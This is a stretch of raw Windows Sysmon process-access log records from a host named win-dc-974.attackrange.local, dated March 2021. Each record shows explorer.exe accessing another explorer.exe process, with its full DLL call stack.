16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245920Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.688{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245919Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245918Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.687{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.671{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 